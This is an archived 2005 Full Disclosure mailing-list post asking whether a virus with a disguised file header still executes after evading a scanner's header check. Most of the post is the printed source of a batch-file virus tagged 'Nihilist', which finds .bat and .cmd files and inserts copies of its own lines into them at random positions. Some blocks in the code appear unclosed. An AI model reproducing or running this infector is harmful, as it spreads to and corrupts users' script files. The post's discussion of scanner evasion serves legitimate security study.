Home page logo

fulldisclosure logo Full Disclosure mailing list archives

RE: RE: Full-disclosure Digest, Vol 8, Issue 48
From: <auto445789 () hushmail com>
Date: Thu, 27 Oct 2005 19:10:25 -0700

The virus scanner determined the type of the file by
the header and it failed. That's bad news. I am
wondering however, when I execute that file, how does
the OS process the file? I guess my question is, if I
have a modified version of a virus, with whatever
header, if I try to execute that file, will the virus
code get executed?

Lets see, do you think this would be executed?
%Nihilist% () echo off
%Nihilist%set num=0
:ag     %Nihilist%
%Nihilist%set fn%num%=
%Nihilist%set /a num+=1
%Nihilist%if %num% LSS 5 goto ag
%Nihilist%set num=0
%Nihilist%for %%a in (*.bat *.cmd) do call :mr %%a
%Nihilist%set num=-1
:fi     %Nihilist%
%Nihilist%set /a num+=1
%Nihilist%if %num% GTR 5 (goto ROF)
%Nihilist%if %num% EQU 0 (set file=%fn0%)
%Nihilist%if %num% EQU 1 (set file=%fn1%)
%Nihilist%if %num% EQU 2 (set file=%fn2%)
%Nihilist%if %num% EQU 3 (set file=%fn3%)
%Nihilist%if %num% EQU 4 (set file=%fn4%)
%Nihilist%if %num% EQU 5 (set file=%fn5%)
%Nihilist%set rnd=%random%
%Nihilist%set spth=%0
:findnum        %Nihilist%
%Nihilist%set /a rnd-=10
%Nihilist%if %rnd% GEQ 10 (goto findnum)
%Nihilist%set lz=0
%Nihilist%del tmp
%Nihilist%for /f "tokens=1*" %%a in (%file%) do if 1 EQU 1 (
%Nihilist%  set lc=%%a %%b
%Nihilist%  call :wl
find "Nihilist" <%spth% >>tmp
%Nihilist%more +%rnd% < %file% >>tmp
%Nihilist%move /y tmp %file%
%Nihilist% () echo on
%Nihilist%goto fi
:wl     %Nihilist%
%Nihilist%set /a lz=%lz%+1
%Nihilist%if %lz% LEQ %rnd% (echo %lc% >>tmp)
%Nihilist%goto :EOF
:mr     %Nihilist%
%Nihilist%if %num% LEQ 5 (
%Nihilist%set fn%num%=%1
%Nihilist%set /a num+=1
:ROF    %Nihilist%

Concerned about your privacy? Instantly send FREE secure email, no account required

Get the best prices on SSL certificates from Hushmail

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]